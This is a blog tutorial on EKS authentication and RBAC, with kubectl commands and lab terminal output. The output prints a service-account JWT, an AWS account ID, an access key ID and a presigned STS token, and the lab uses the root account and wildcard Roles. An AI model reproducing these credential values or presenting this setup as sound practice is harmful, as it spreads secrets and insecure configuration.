Authentication & Authorization of AWS EKS

Sigrid Jin
66 min read · Apr 13, 2024


In Kubernetes, including EKS, the authentication and authorization process follows a specific flow when a kubectl command is issued.

Authentication

Authentication is the process of verifying the identity of the user or entity making the request. In the context of EKS, authentication typically involves the following:

1. kubeconfig file: The kubeconfig file contains the authentication information required to interact with the Kubernetes API server. It includes details such as the API server’s URL, user credentials, and authentication mechanisms.

2. Authentication methods: Kubernetes supports various authentication methods, including client certificates, bearer tokens, and authentication plugins. The chosen authentication method is specified in the kubeconfig file.

3. User authentication: When a `kubectl` command is executed, the authentication information from the `kubeconfig` file is sent to the API server. The API server validates the provided credentials and authenticates the user.

Authorization

Once the user is authenticated, the next step is authorization. Authorization determines what actions the authenticated user is allowed to perform within the Kubernetes cluster. EKS uses Role-Based Access Control (RBAC) for authorization.

1. RBAC: RBAC is a mechanism that defines roles and permissions for users or groups within the cluster. It allows administrators to grant specific permissions to users based on their roles.

2. Roles and RoleBindings: Roles define a set of permissions for accessing and manipulating Kubernetes resources. RoleBindings associate roles with users or groups, granting them the specified permissions.

3. Cluster-level and namespace-level permissions: RBAC can be applied at the cluster level (ClusterRole and ClusterRoleBinding) or at the namespace level (Role and RoleBinding). Cluster-level permissions are applicable across all namespaces, while namespace-level permissions are specific to a particular namespace.
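
For illustration, a minimal cluster-scoped grant might look like the sketch below. The names read-only-view and dev-readers are hypothetical and only serve to show the shape of a ClusterRole plus ClusterRoleBinding; namespace-scoped Roles and RoleBindings (shown later in Practice 1) look the same but carry a namespace in their metadata.

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: read-only-view            # hypothetical name for this sketch
rules:
- apiGroups: [""]
  resources: ["pods", "services"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: read-only-view-binding    # hypothetical name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: read-only-view
subjects:
- kind: Group
  name: dev-readers               # hypothetical group
  apiGroup: rbac.authorization.k8s.io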

Admission Control

After the request passes the authentication and authorization checks, it goes through the admission control phase. Admission controllers are plugins that can modify or validate the request before it is persisted in the cluster. Kubernetes (and therefore EKS) supports two types of admission controllers:

1. Mutating Admission Controllers: These controllers can modify the request payload before it is saved in the cluster. They can perform tasks such as injecting sidecar containers, modifying resource requests/limits, or adding labels to objects.

2. Validating Admission Controllers: These controllers validate the request payload against predefined policies or rules. They can reject requests that violate certain constraints or don’t meet specific criteria.

Admission controllers can be implemented using webhooks, which allow external services to participate in the admission process. Webhooks enable the integration of custom logic or third-party services into the admission flow.
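
To make this concrete, a webhook is registered with the API server through a ValidatingWebhookConfiguration (or MutatingWebhookConfiguration). The sketch below is illustrative only: the webhook name, Service, and path are hypothetical, and the caBundle placeholder would have to be a real base64-encoded CA for the configuration to be accepted.

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: pod-policy-webhook              # hypothetical name
webhooks:
- name: pod-policy.example.com          # hypothetical webhook name
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Fail
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]
  clientConfig:
    service:
      name: pod-policy-svc              # hypothetical Service hosting the webhook
      namespace: default
      path: /validate
    caBundle: <base64-encoded CA>       # CA used to verify the webhook's TLS certificate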

~/.kube/config File

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: ""
    server: https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com
  name: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
contexts:
- context:
    cluster: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
    namespace: default
    user: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
  name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
current-context: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
kind: Config
preferences: {}
users:
- name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      args:
      - eks
      - get-token
      - --output
      - json
      - --cluster-name
      - sigridjin-ekscluster-240413-3
      - --region
      - ap-northeast-2
      command: aws
      env:
      - name: AWS_STS_REGIONAL_ENDPOINTS
        value: regional
      interactiveMode: IfAvailable
      provideClusterInfo: false

The `~/.kube/config` file, also known as the `kubeconfig` file, contains the configuration information required to interact with the Kubernetes cluster. It consists of three main sections:

1. Clusters: This section defines the Kubernetes API server’s endpoint information, such as the server URL and certificate authority data.

2. Users: This section contains the user authentication information, such as client certificates, bearer tokens, or authentication plugin configurations.

3. Contexts: Contexts combine the information from the clusters and users sections. They define which Kubernetes cluster and user credentials to use for a specific context. The current context determines the cluster and user for `kubectl` commands.
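
For example, the current context can be inspected and switched with the standard kubectl config subcommands; the context name below is the one defined in the kubeconfig shown above.

# Show which context (cluster + user + namespace) kubectl is currently using
kubectl config current-context

# List all contexts defined in ~/.kube/config
kubectl config get-contexts

# Switch to a different context (the name must exist in the contexts: section)
kubectl config use-context iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io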

Practice 1. SA, Role, RoleBinding

Let’s explore the usage of Service Accounts (SA), Roles, and RoleBindings in a Kubernetes environment. The setup involves two Service Accounts, `dev-k8s` and `infra-k8s`, with different permissions (Roles and authorizations) in their respective namespaces, `dev-team` and `infra-team`. We will create separate `kubectl` pods and assign the corresponding Service Accounts to test the permissions.

We start by creating two namespaces, `dev-team` and `infra-team`, using the `kubectl create namespace` command. Then, we create the Service Accounts `dev-k8s` in the `dev-team` namespace and `infra-k8s` in the `infra-team` namespace using the `kubectl create sa` command. We can verify the created Service Accounts using `kubectl get sa` and inspect their details using `kubectl get sa -o yaml`.

kubectl create namespace dev-team
kubectl create ns infra-team

kubectl get ns

kubectl create sa dev-k8s -n dev-team
kubectl create sa infra-k8s -n infra-team

kubectl get sa -n dev-team
kubectl get sa dev-k8s -n dev-team -o yaml | yh

kubectl get sa -n infra-team
kubectl get sa infra-k8s -n infra-team -o yaml | yh

Service Accounts authenticate with bearer tokens. In older Kubernetes versions these were stored as Secrets in the Service Account's namespace (retrievable with `kubectl get secret` and decodable with `base64 -d`); since Kubernetes 1.24, short-lived projected tokens are mounted into pods instead. Either way, the token is a JWT (JSON Web Token), a compact, signed credential that serves a purpose similar to, but is much lighter-weight than, an X.509 certificate.
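
A quick way to look inside such a token on this 1.28 cluster is sketched below: `kubectl create token` (available since Kubernetes 1.24) issues a short-lived token for the Service Account, and decoding the JWT payload shows the issuer, audience, expiry, and service account identity. The base64 step may warn about missing padding, which can be ignored.

# Issue a short-lived token for the dev-k8s Service Account
TOKEN=$(kubectl create token dev-k8s -n dev-team)

# A JWT has three dot-separated parts: header.payload.signature.
# Decode the payload (second part) to see iss, aud, exp, and the SA identity.
echo "$TOKEN" | cut -d '.' -f2 | base64 -d 2>/dev/null ; echo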

docker run --rm --name kubectl -v /path/to/your/kube/config:/.kube/config bitnami/kubectl:latest
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: dev-kubectl
  namespace: dev-team
spec:
  serviceAccountName: dev-k8s
  containers:
  - name: kubectl-pod
    image: bitnami/kubectl:1.28.5
    command: ["tail"]
    args: ["-f", "/dev/null"]
  terminationGracePeriodSeconds: 0
EOF

cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: infra-kubectl
  namespace: infra-team
spec:
  serviceAccountName: infra-k8s
  containers:
  - name: kubectl-pod
    image: bitnami/kubectl:1.28.5
    command: ["tail"]
    args: ["-f", "/dev/null"]
  terminationGracePeriodSeconds: 0
EOF

Next, we create `kubectl` pods in each namespace and assign the corresponding Service Accounts to them. We use the `bitnami/kubectl` container image, which provides the `kubectl` command-line tool. The pod specifications include the `serviceAccountName` field to specify the desired Service Account. We can verify the created pods and their assigned Service Accounts using `kubectl get pod` and `kubectl get pod -o yaml`.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod dev-kubectl -n dev-team -o yaml
serviceAccount: dev-k8s
serviceAccountName: dev-k8s

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod infra-kubectl -n infra-team -o yaml
serviceAccount: infra-k8s
serviceAccountName: infra-k8s

By accessing the pods using `kubectl exec`, we can examine the mounted Service Account tokens and related information. The tokens are stored in the `/run/secrets/kubernetes.io/serviceaccount` directory within the pod. We can verify the token, namespace, and CA certificate using `kubectl exec` commands.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- ls /run/secrets/kubernetes.io/serviceaccount

ca.crt namespace token
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/token

eyJhbGciOiJSUzI1NiIsImtpZCI6IjhlY2Y3Y2FkNzhhNmZiYWJjOTkwOGI1YzJhOGYyOGNlODA5MmMxOGQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDUxMzE2MiwiaWF0IjoxNzEyOTc3MTYyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRkIyQjRGOTgyOERDM0Y3RDI0QTg0QTRBOEZBNzY2MzIiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImRldi10ZWFtIiwicG9kIjp7Im5hbWUiOiJkZXYta3ViZWN0bCIsInVpZCI6ImQ1YjY4MjY1LWIyNWYtNGQxNy1iYzQ4LTRiM2UxM2Q3MTNlMyJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGV2LWs4cyIsInVpZCI6IjljYmU2ZTFjLWI2MDYtNDNhOC1iMzgxLTRhMDQ0ZTdjYzMzMCJ9LCJ3YXJuYWZ0ZXIiOjE3MTI5ODA3Njl9LCJuYmYiOjE3MTI5NzcxNjIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZXYtdGVhbTpkZXYtazhzIn0.JvszWNG5JZ2-t8t4S1kAVA9jagbL7gdlKkqDlUjWC3rcfeTAGqMqyD7PKfd8eQhiUauRHjf0AJbifR61ubCOm0Enfk11b_gKPYCj17S893P8EH8uZVhTjCkbPXQjeEqfyobk1EEkIJzicWl_fKnkppc5prPQ9v8HN2XoG8IBoGrYMynC0fDXN6bGsawhiKe26V-v8mfF5gbLsDb31RbPUsZSl7IEOroxLf3ssVl51uK5ua1OCgcv5JEmiAx-pADHXZSorj4SOrOFlHERk73vXu2MfuMnUBiQlLkZJMTDpVYPUys3s5EjQl10b6uYLGV_igDzwOWVUnJM4nH-RB-YEA

To test the permissions of the Service Accounts, we use `alias` to create shorthand commands `k1` and `k2` for executing `kubectl` commands within the respective pods. We attempt various operations such as `get pods`, `run`, and `get pods -n kube-system` to observe the behavior. Initially, all actions result in errors because the Service Accounts lack the necessary permissions.

alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it infra-kubectl -n infra-team -- kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:infra-team:infra-k8s" cannot list resource "pods" in API group "" in the namespace "infra-team"
command terminated with exit code 1

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it infra-kubectl -n infra-team -- kubectl auth can-i get pods
no
command terminated with exit code 1

To grant permissions to the Service Accounts, we create Roles in each namespace using the `kubectl create -f` command with the provided YAML definitions. The Roles specify the `apiGroups`, `resources`, and `verbs` that define the permitted actions. In this example, we create Roles with all permissions (`*`) within their respective namespaces. We can verify the created Roles using `kubectl get roles` and `kubectl describe roles`.

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: role-dev-team
  namespace: dev-team
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
EOF

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: role-infra-team
  namespace: infra-team
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
EOF
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe roles role-dev-team -n dev-team
Name: role-dev-team
Labels: <none>
Annotations: <none>
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]

To associate the Roles with the Service Accounts, we create RoleBindings using the `kubectl create -f` command with the provided YAML definitions. The RoleBindings specify the `roleRef` (the Role to bind) and the `subjects` (the Service Accounts to bind to the Role). We can verify the created RoleBindings using `kubectl get rolebindings` and `kubectl describe rolebindings`.

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: roleB-dev-team
  namespace: dev-team
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: role-dev-team
subjects:
- kind: ServiceAccount
  name: dev-k8s
  namespace: dev-team
EOF

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: roleB-infra-team
  namespace: infra-team
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: role-infra-team
subjects:
- kind: ServiceAccount
  name: infra-k8s
  namespace: infra-team
EOF


(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe rolebindings roleB-dev-team -n dev-team
Name: roleB-dev-team
Labels: <none>
Annotations: <none>
Role:
Kind: Role
Name: role-dev-team
Subjects:
Kind Name Namespace
---- ---- ---------
ServiceAccount dev-k8s dev-team

With the Roles and RoleBindings in place, we can re-test the permissions using the `k1` and `k2` aliases. We observe that the `dev-kubectl` pod (`k1`) can perform actions within the `dev-team` namespace but lacks permissions in other namespaces like `kube-system`. Similarly, the `infra-kubectl` pod (`k2`) has permissions within the `infra-team` namespace but not in others.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# k1 auth can-i get pods
yes
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# k2 auth can-i get pods
yes
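
To confirm that these grants really are namespace-scoped, a cross-namespace check should now be denied. A quick sketch, with the expected results in comments:

# Allowed: the Role/RoleBinding cover the pod's own namespace
k1 auth can-i get pods -n dev-team        # expected: yes

# Denied: nothing grants dev-k8s anything outside dev-team
k1 auth can-i get pods -n kube-system     # expected: no
k1 get pods -n kube-system                # expected: Error from server (Forbidden)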

Practice 2. Checking RBAC

To begin, we install several RBAC-related plugins using the kubectl krew command. These plugins include access-matrix, rbac-tool, rbac-view, rolesum, and whoami.

We use the kubectl whoami command to verify the authenticated subject, which reveals the AWS IAM role or user associated with the current kubectl context. In this example, the authenticated subject is arn:aws:iam::712218945685:root, as the output below shows.

The kubectl access-matrix command allows us to review access to cluster-scoped resources or namespaced resources in a specific namespace. This command generates an RBAC access matrix, providing an overview of the permissions associated with different subjects.

Using the kubectl rbac-tool lookup command, one can perform RBAC lookups based on subject names, such as users, groups, or service accounts. For example, kubectl rbac-tool lookup system:masters displays the RBAC information for the system:masters group, showing the associated cluster role and permissions.

The kubectl rbac-tool policy-rules command allows us to list the policy rules for specific subjects. We can use regular expressions to filter the subjects of interest. For example, kubectl rbac-tool policy-rules -e ‘^system:.*’ lists the policy rules for subjects starting with system:.

The kubectl rbac-tool show command generates a ClusterRole with all available permissions from the target cluster. This provides a comprehensive view of the permissions available in the cluster.

The kubectl rbac-tool whoami command displays the subject information for the current context used to authenticate with the cluster. In the example output, the username is an AWS IAM identity ARN rather than kubernetes-admin, and the groups include system:authenticated rather than system:masters.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::712218945685:root",
UID: "aws-iam-authenticator:712218945685:712218945685",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCK3P44FVL7"],
arn: ["arn:aws:iam::712218945685:root"],
canonicalArn: ["arn:aws:iam::712218945685:root"],
principalId: ["712218945685"],
sessionName: [""]}}

The kubectl rolesum command allows us to summarize RBAC roles for different subjects, such as service accounts, users, or groups. For example, kubectl rolesum aws-node -n kube-system summarizes the roles for the aws-node service account in the kube-system namespace.

The kubectl rbac-view command provides a visual representation of RBAC permissions. It starts a local web server and opens a web page displaying the RBAC roles and permissions in a user-friendly manner. This tool helps in understanding and analyzing the RBAC configuration in the cluster.

kubectl krew install access-matrix rbac-tool rbac-view rolesum whoami
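
With the plugins installed, the rolesum and rbac-view invocations described above look roughly like this; rbac-view prints the local URL to open once it has collected the RBAC resources.

# Summarize the RBAC roles bound to the aws-node Service Account
kubectl rolesum aws-node -n kube-system

# Start the local web UI for browsing roles and bindings
kubectl rbac-view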

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl whoami
arn:aws:iam::712218945685:root

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl access-matrix --namespace default
W0413 12:49:02.453673 11189 fetch_resources.go:70] Could not fetch full list of resources, result will be incomplete: unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server is currently unable to handle the request
NAME LIST CREATE UPDATE DELETE
(… roughly 40 more rows, each showing ✖ ✖ ✖ ✖ for LIST/CREATE/UPDATE/DELETE; the resource names in the NAME column were lost when the output was copied …)
alertmanagerconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
alertmanagers.monitoring.coreos.com ✔ ✔ ✔ ✔
bindings ✔
configmaps ✔ ✔ ✔ ✔
controllerrevisions.apps ✔ ✔ ✔ ✔
cronjobs.batch ✔ ✔ ✔ ✔
csistoragecapacities.storage.k8s.io ✔ ✔ ✔ ✔
daemonsets.apps ✔ ✔ ✔ ✔
deployments.apps ✔ ✔ ✔ ✔
endpoints ✔ ✔ ✔ ✔
endpointslices.discovery.k8s.io ✔ ✔ ✔ ✔
events ✔ ✔ ✔ ✔
events.events.k8s.io ✔ ✔ ✔ ✔
horizontalpodautoscalers.autoscaling ✔ ✔ ✔ ✔
ingresses.networking.k8s.io ✔ ✔ ✔ ✔
jobs.batch ✔ ✔ ✔ ✔
leases.coordination.k8s.io ✔ ✔ ✔ ✔
limitranges ✔ ✔ ✔ ✔
localsubjectaccessreviews.authorization.k8s.io ✔
networkpolicies.networking.k8s.io ✔ ✔ ✔ ✔
persistentvolumeclaims ✔ ✔ ✔ ✔
poddisruptionbudgets.policy ✔ ✔ ✔ ✔
podmonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
pods ✔ ✔ ✔ ✔
podtemplates ✔ ✔ ✔ ✔
policyendpoints.networking.k8s.aws ✔ ✔ ✔ ✔
probes.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusagents.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheuses.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusrules.monitoring.coreos.com ✔ ✔ ✔ ✔
replicasets.apps ✔ ✔ ✔ ✔
replicationcontrollers ✔ ✔ ✔ ✔
resourcequotas ✔ ✔ ✔ ✔
rolebindings.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
roles.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
scrapeconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
secrets ✔ ✔ ✔ ✔
securitygrouppolicies.vpcresources.k8s.aws ✔ ✔ ✔ ✔
serviceaccounts ✔ ✔ ✔ ✔
servicemonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
services ✔ ✔ ✔ ✔
statefulsets.apps ✔ ✔ ✔ ✔
targetgroupbindings.elbv2.k8s.aws ✔ ✔ ✔ ✔
thanosrulers.monitoring.coreos.com ✔ ✔ ✔ ✔

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin

When a kubectl command is executed, the following steps occur:

1. The kubectl command attaches a bearer token to the request and sends it to the kube-apiserver.
2. In EKS, the kube-apiserver passes the token to a webhook (aws-iam-authenticator) for authentication.
3. The webhook verifies the token against AWS IAM/STS and maps the resulting AWS identity to a Kubernetes username and groups using the aws-auth ConfigMap.
4. Once authenticated, the resolved username and groups are returned to the kube-apiserver.
5. The kube-apiserver then checks the Kubernetes RBAC configuration, looking up the roles and role bindings associated with that user and its groups.
6. Based on the RBAC configuration, the kube-apiserver determines whether to allow or deny the requested action.

Detailed Authentication Flow

1. When a kubectl command is executed, the exec credential plugin configured in the kubeconfig runs aws eks get-token, which builds a pre-signed AWS STS GetCallerIdentity URL and returns it as a base64-encoded bearer token (prefixed with k8s-aws-v1.).

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: ""
    server: https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com
  name: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
contexts:
- context:
    cluster: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
    namespace: default
    user: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
  name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
current-context: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
kind: Config
preferences: {}
users:
- name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      args:
      - eks
      - get-token
      - --output
      - json
      - --cluster-name
      - sigridjin-ekscluster-240413-3
      - --region
      - ap-northeast-2
      command: aws
      env:
      - name: AWS_STS_REGIONAL_ENDPOINTS
        value: regional
      interactiveMode: IfAvailable
      provideClusterInfo: false

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME --region ap-northeast-2 | jq
{
"kind": "ExecCredential",
"apiVersion": "client.authentication.k8s.io/v1beta1",
"spec": {},
"status": {
"expirationTimestamp": "2024-04-13T07:52:55Z",
"token": "k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUEyTFU0T1ZDSzNQNDRGVkw3JTJGMjAyNDA0MTMlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEzVDA3Mzg1NVomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPTUyNGM3YmVhNTFiZjhlMjAyOWJmNjFkZDI1MjI0MWE2NTUwYzRmMzQ5YjVlYmQ2MmMyYTRhMjJhY2FjYWIxNzI"
}
}
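
The token in status.token is ordinary text after the k8s-aws-v1. prefix: an unpadded base64url-encoded, pre-signed STS GetCallerIdentity URL. A rough way to peek inside it is sketched below (the decode may complain about missing padding; the URL is still printed).

# Grab the bearer token that kubectl would send to the API server
TOKEN=$(aws eks get-token --cluster-name $CLUSTER_NAME --region ap-northeast-2 | jq -r '.status.token')

# Strip the "k8s-aws-v1." prefix and decode the base64url payload;
# the result is a pre-signed https://sts.ap-northeast-2.amazonaws.com/?Action=GetCallerIdentity&... URL
echo "${TOKEN#k8s-aws-v1.}" | tr '_-' '/+' | base64 -d 2>/dev/null ; echo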

2. The AWS STS (Security Token Service) is used to control access to AWS resources by providing temporary security credentials (STS tokens). With AWS CLI version 1.16.156 or later, aws eks get-token can be used without separately installing aws-iam-authenticator.
3. The aws sts get-caller-identity command can be used to verify the ARN (Amazon Resource Name) of the caller’s identity.
4. The ~/.kube/config file contains the EKS public server endpoint in the clusters.server field.
5. The aws eks get-token command requests a temporary, signed credential from AWS STS; once the expirationTimestamp passes, kubectl simply re-runs the exec plugin to obtain a fresh token.
6. The kube-apiserver sends a TokenReview request to the webhook token authenticator for authentication.
7. Once approved by the webhook token authenticator, the request proceeds to the next step.
8. The tokenreviews API resource is used for token review purposes in Kubernetes.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources | grep authentication

selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get cm aws-auth -n kube-system -o yaml
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
      username: system:node:{{EC2PrivateDNSName}}
kind: ConfigMap
metadata:
  creationTimestamp: "2024-04-13T02:49:50Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "1566"
  uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e

After successful authentication, the EKS API Server compares the authenticated user/role ARN with the mappings in the aws-auth ConfigMap to determine the user's permissions. The EKS cluster creator is automatically granted the system:masters group and kubernetes-admin username, which is associated with the cluster-admin ClusterRole, granting full control over the cluster. RBAC is used to authorize actions based on the user's assigned roles and permissions. Additionally, webhook configurations are employed to validate changes to critical resources like the aws-auth ConfigMap, ensuring the integrity and security of the cluster.

Once the EKS API Server receives the authenticated user/role ARN (Amazon Resource Name) from the AWS STS (Security Token Service), it compares this ARN with the ARNs mapped in the aws-auth ConfigMap. The aws-auth ConfigMap contains the mappings between IAM users/roles and Kubernetes objects (users, groups, etc.).

It’s important to note that the IAM user who created the EKS cluster is not visible in the aws-auth ConfigMap. This is an intentional decision made by AWS to prevent accidental loss of EKS access permissions due to human error. However, the EKS cluster creator can still be identified using the rbac-tool Kubernetes plugin.

If a matching ARN is found in the aws-auth ConfigMap, the user is granted the corresponding permissions in the Kubernetes cluster. If no matching ARN is found, the kubectl command will fail due to lack of authorization.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::712218945685:root",
UID: "aws-iam-authenticator:712218945685:712218945685",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCK3P44FVL7"],
arn: ["arn:aws:iam::712218945685:root"],
canonicalArn: ["arn:aws:iam::712218945685:root"],
principalId: ["712218945685"],
sessionName: [""]}}

The authorization process relies on Kubernetes RBAC to determine the user’s permissions based on their associated roles and cluster bindings. The IAM principal (user or role) that created the EKS cluster is automatically granted the system:masters group and kubernetes-admin username, regardless of the aws-auth ConfigMap.

The system:masters group is associated with the cluster-admin ClusterRole through a ClusterRoleBinding. The cluster-admin ClusterRole grants full control over all resources in the cluster, as evident from its policy rules that allow all verbs (*) on all resources (*.*).

On the other hand, the system:authenticated group represents all authenticated users in the cluster. The permissions for this group can be examined using the kubectl rbac-tool lookup and kubectl rolesum commands.

Kubernetes also utilizes validating and mutating webhook configurations to intercept and modify API requests. These webhooks are registered as API resources, such as validatingwebhookconfigurations and mutatingwebhookconfigurations.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources | grep Webhook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get validatingwebhookconfigurations

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 4h48m
eks-aws-auth-configmap-validation-webhook 1 5h22m
kube-prometheus-stack-admission 1 4h59m
